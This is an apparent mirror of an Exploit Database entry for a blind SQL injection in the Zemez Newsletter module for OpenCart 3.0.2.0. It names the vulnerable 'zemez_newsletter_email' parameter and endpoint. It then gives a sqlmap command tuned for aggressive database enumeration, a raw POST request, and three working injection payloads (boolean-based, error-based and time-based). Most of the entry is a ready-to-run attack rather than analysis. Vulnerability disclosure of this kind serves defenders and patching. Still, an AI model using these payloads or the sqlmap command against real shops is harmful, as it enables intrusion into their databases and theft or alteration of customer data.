OpenCart v3.x Newsletter Module – Blind SQLi

• Exploit Database
• 18 阅读

• 作者： Saud Alenazi
  日期： 2022-05-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50942/

• # Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi
  # Date: 19/05/2022
  # Exploit Author: Saud Alenazi
  # Vendor Homepage: https://www.opencart.com/
  # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez
  # Version: v.3.0.2.0
  # Tested on: XAMPP, Linux
  # Contact: https://twitter.com/dmaral3noz
  
  
  * Description :
  
  Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. 
  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
  
  * Steps to Reproduce :
  - Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter
  - Save request in BurpSuite
  - Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
  
  
  
  Request :
  
  ===========
  
  POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Encoding: gzip,deflate
  Content-Length: 29
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
  Connection: Keep-alive
  
  zemez_newsletter_email=saud
  
  
  ===========
  
  Output :
  
  Parameter: zemez_newsletter_email (POST)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
  Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -
  
  Type: error-based
  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK